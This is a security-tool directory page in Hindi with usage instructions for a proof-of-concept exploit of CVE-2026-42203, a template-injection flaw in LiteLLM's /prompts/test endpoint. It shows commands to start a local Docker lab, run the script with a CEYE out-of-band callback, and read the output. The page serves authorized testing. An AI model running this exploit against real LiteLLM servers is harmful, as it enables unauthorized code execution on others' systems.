Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/astianjy/cve-2026-42203
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubastianjy/cve-2026-42203

CVE-2026-42203

CVE-2026-42203 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, LiteLLM के /prompts/test एंडपॉइंट में SSTI भेद्यता, अधिकृत परीक्षण के लिए CEYE कॉलबैक सत्यापन के साथ।

रिपॉजिटरी देखें
13 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

LiteLLM CVE-2026-42203 PoC उपयोग निर्देश

यह दस्तावेज़ बताता है कि स्थानीय LiteLLM वातावरण कैसे शुरू करें और /prompts/test SSTI कमजोरी को सत्यापित करने के लिए CVE-2026-42203.py निष्पादित करें।

केवल अपने अधिकृत स्थानीय प्रयोग वातावरण में उपयोग करें। स्क्रिप्ट को अनधिकृत सार्वजनिक लक्ष्यों पर इंगित न करें।

1. स्थानीय वातावरण प्रारंभ करें

Lab निर्देशिका में जाएँ, LiteLLM, Postgres और Prometheus प्रारंभ करें:

root@kitploit:~
docker compose up -d

कंटेनर की स्थिति देखें:

root@kitploit:~
docker compose ps

सेवा तक पहुँच की पुष्टि करें:

root@kitploit:~
curl http://127.0.0.1:4000/

Master_Key डिफ़ॉल्ट रूप से: sk-master-test-key-1234

2. CEYE और LiteLLM Key कॉन्फ़िगर करें

http://ceye.io/profile

कमांड लाइन पैरामीटर के माध्यम से पास करें:

root@kitploit:~
python3 cve_2026_42203_litellm_prompts_test_ssti.py \
  --auth 'sk-local-test-key' \
  --ceye-domain 'your-id.ceye.io' \
  --ceye-token 'your-ceye-api-token'

चर का अर्थ:

  • LITELLM_API_KEY:LiteLLM तक पहुँच Key, स्थानीय Docker वातावरण में आमतौर पर .env में LITELLM_MASTER_KEY से मेल खाती है।
  • CEYE_DOMAIN:आपका CEYE उपडोमेन, उदाहरण xxxxxx.ceye.io।
  • CEYE_TOKEN:आपका CEYE API Token, वापसी कनेक्शन रिकॉर्ड क्वेरी करने के लिए।

3. PoC निष्पादित करें

पूर्ण उदाहरण:

root@kitploit:~
python3 cve_2026_42203_litellm_prompts_test_ssti.py \
  --target http://127.0.0.1:4000 \
  --auth 'sk-local-test-key' \
  --ceye-domain 'your-id.ceye.io' \
  --ceye-token 'your-ceye-api-token'

मुख्य पैरामीटर:

  • --target:LiteLLM सेवा पता, डिफ़ॉल्ट http://127.0.0.1:4000 है।
  • --auth / --api-key:/prompts/test कॉल करने के लिए उपयोग की जाने वाली LiteLLM Key।
  • --ceye-domain:CEYE वापसी कनेक्शन डोमेन।
  • --ceye-token:CEYE API Token। स्क्रिप्ट आउटपुट करते समय स्वचालित रूप से मास्क करके दिखाया जाता है।
  • --wait:CEYE वापसी कनेक्शन के लिए प्रतीक्षा सेकंड, डिफ़ॉल्ट 20।
  • --interval:CEYE रिकॉर्ड पोलिंग अंतराल सेकंड, डिफ़ॉल्ट 3।
  • --timeout:HTTP अनुरोध टाइमआउट, डिफ़ॉल्ट 10 सेकंड।
  • --insecure:लक्ष्य स्व-हस्ताक्षरित HTTPS प्रमाणपत्र होने पर यह पैरामीटर जोड़ें, TLS प्रमाणपत्र सत्यापन अक्षम करें।

4. परिणाम निर्धारण

यदि CEYE को वापसी कनेक्शन प्राप्त होता है, तो स्क्रिप्ट आउटपुट करेगी:

root@kitploit:~
[VULNERABLE] CEYE received the callback request.

यदि प्रतीक्षा अवधि के भीतर कोई वापसी कनेक्शन प्राप्त नहीं होता है, तो स्क्रिप्ट आउटपुट करेगी:

root@kitploit:~
[NOT_VULNERABLE] CEYE did not receive the callback request within the wait window.
टूल डाउनलोड करें